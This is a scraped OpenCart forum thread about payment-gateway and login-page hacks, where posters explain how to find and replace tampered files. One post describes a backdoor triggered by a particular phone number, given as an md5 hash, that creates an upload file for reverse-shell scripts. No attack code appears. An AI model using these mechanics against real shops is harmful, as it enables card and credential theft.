-Jeff

I recall such incidents, a few months ago, there where some topics on this.
Unfortunately, you probably have only one way to go, by removing the source completely,
in FULL, by deleting the Shop Sub, on the Server, and afterwards re-install a guaranteed still 'virgin'
Backup Copy. And make sure, you have NOTHING in your DB, eventually repeating the whole thing again.
It's a Virus ok, so, just act accordingly.
Good Luck !
Ernie
PS. For others: Such 'Content' would likely be placed also with/in highly popular Paid Themes, such as Journal, and others, as well, and is usually coded in unreadable Base64 Format. And possibly downloaded, by plain accident, from some shady Freeware-Servers. For them, it's a just free way to sell Themes! Buy Now, we get paid LATER !

My Github OC Site: https://github.com/IP-CAM
5'600 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
/catalog/controller/payment/
/catalog/model/payment/
The standard Authorize.net files are authorizenet_aim.php and authorizenet_sim.php, so it should be named something differently. If those are the only ones you should open them up and see if there is hard-coded information in there (to send it to the hacker's account).
investigated and cleaned out a friend his site some time ago,
Koeltechnische deurrubbers eenvoudig online op maat bestellen.
Alle niet stekplichtige onderdelen zoals scharnieren, sloten, randverwarming en verlichting voor alle typen koelingen en vriezers.
https://koelcel-onderdelen.com
1. VERY IMPORTANT: The login page has probably been hacked!
The login page code has been edited so that if you try and change the passwords, when you login again the Hacker receives the new password directly to his email account.
2. You CANNOT enable/disable Authorize.net via OpenCart admin.
The hack uses a file that by-passes this function completely so it has nothing to do with the payment settings you have set up. You must delete/replace hacked files via FTP to restore normal function.
3. You will have to fix this problem via FTP by locating and overwriting the changed files then changing your password (ideally through PhpMyAdmin). There is no point changing your passwords until AFTER you fix the login page hack.
4. You do not need to replace ALL your files to fix this... that is a last resort!
We do not believe this hack requires the hacker is able to login... but we cannot be sure. In v1.5.6 we found all sorts of junk had been uploaded to the server... but I do not think this is the 'download vulnerability' people spoke about before as we are in V2 and we had already removed the list of file types that could be uploaded.
Here is how we fixed it:
Firstly, we had to find all the files that had been changed by the hacker... you will see that these have a 'Last modified' date that will be very recent compared to the other files (most of which will be the same date from the time of installation).
We found on both occasions that these were the files that had been changed:
/admin/controller/extension/payment.php
/admin/controller/common/login.php
/catalog/controller/payment/authorizenet_aim.php
However, we would advise you to check through the folders for any other new or recently modified files if the following instructions do not fix your problem.
We had a copy of the website elsewhere so we could see that not only were the last modified dates 'today' but the file sizes were notably different - so the code was not the same.
We suggest you take a full backup of your site via FTP - name it clearly as a 'hacked' version not to be re-uploaded.
Once this is done unzip a new local copy of your version of OpenCart... locate the the files listed above and copy them to a folder & subfolders (we called ours 'Authorize Hack Clean Files') . You will then be able to quickly upload if it ever happens again.
Then delete the files on the server and replace with the 'clean' files - this should be enough to fix the problem.
Please note:
You cannot simply rename the authorizenet_aim.php file - even if you change the name and remove the file extension - we found it kept loading the Authorize.net option in the checkout. It must be completely removed.
Once those changes are done, you can set up a new password for your accounts. We used a secure password generator to try and make it more certain it was not a hack via password login... we don't think it is... but we do not know how this hack is done.
Lastly we deleted all the allowed file types and meme types in the Settings > Uploads... we kept a copy of these lists in case we need to put any/all of them back again.
I hope these details help a few people out - i would really appreciate anyone listing any 'official' name for this hack as it seems to be happening often enough and in the same way, I imagine it has been identified by others too?
Related posts:
viewtopic.php?f=179&t=147282
http://forum.opencart.com/viewtopic.php?f=20&t=144753
But one could fully remove all those payment (and/or shipping) related files, one does not use,You CANNOT enable/disable Authorize.net via OpenCart admin.
from all the template/ model/ controller/ language/ - sections, in the Admin and Root Section.
Then, at least, one can be sure, that, if something like this shows up, that it has nothing to do
with the OC Shop Source and/or Settings themselfs.
Just to mention this!
Ernie
BTW. There is another interesting Topic on this here:
http://forum.opencart.com/viewtopic.php?f=179&t=147282
My Github OC Site: https://github.com/IP-CAM
5'600 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
If you're using shared hosting and trying to save money by having one account for multiple domains, I'd suggest not doing that. More than likely the hacker got in through one of your other sites and once they are in, they have access to everything on your hosting account.
Opencart Hosting Plans, Domain Registration, Microsoft and Google Email and More
Visit our website for great deals and most importantly, fast and friendly support - www.evolvewebhosting.com
We too are seeing lots of payment gateway hacks in Opencart in which the Opencart Admin password and other info are compromised. In some cases, even the default payment method is changed and a new payment channel is added like a phishing form that collects credit card details and other confidential info of customers.
Recently, our engineers also discovered that hackers have planted a backdoor in Opencart. Generally, in e-commerce stores, the site allows free account creation. The attackers modified the code in such a way that by entering a particular phone no a file 'info.php' gets created which gives the hacker an option yo upload a file.
Researchers at Astra have uncovered the step by step process.
Step1: The attackers used free signups to create multiple new users. Multiple accounts meant minimum detection possibility.
Step2: Then, the attackers entered a particular Phone No. in the input field. The attackers have obfuscated real Phone No. by encrypting in md5 format. The encrypted string is66b6d63b9634e1159e53e29858de2c2d. This No. acts as a master key to upload backdoors.
Step3: As soon the phone no is added, a file with a nameinfo.php is created. So the final URL looks something like thisexample.com/info.php.
Step4: When the fileinfo.php is accessed by the attackers, it gives them the ability to upload files.
Step5: This upload option allows attackers to upload infected PHP files. These files open a reverse TCP, ICMP etc connection to the attackers. When the files are uploaded in the root directory the results could be more disastrous!
We recommend you to have a regular code audit of your website to protect it from such attacks.
Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk
They post only to advertise an unneccessary service!
If they can show me one hacked shop with the current version (with no modifications!), I will be the first who book them.
Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.
Well, as long as even some Super-Smarties around here propagated CHMOD 775/777Have you ever seen how the attackers get access in the first place?
to be a valid Numbers for OC files, it's no wonder, that some get hurt ...
Ernie
PS. A very old one ...
http://www.opencart.org/opencart/cgi-bin/
My Github OC Site: https://github.com/IP-CAM
5'600 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
https://www.google.com/search?q=Opencart+Vulnerability
My Github OC Site: https://github.com/IP-CAM
5'600 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Users browsing this forum: No registered users and 47 guests